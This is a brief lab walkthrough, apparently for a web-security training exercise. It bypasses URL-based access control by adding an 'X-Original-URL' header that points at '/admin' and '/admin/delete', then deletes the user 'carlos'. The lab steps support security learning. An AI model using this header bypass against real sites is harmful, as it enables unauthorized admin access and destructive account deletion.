Steps to solve:
1. Send home page to repeater.
2. To get admin panel, Add request header X-Original-URL: /admin
3. To delete user carlos, add request header
X-Original-URL: /admin/delete
And also add the parameter in url
GET /?username=carlos HTTP/2
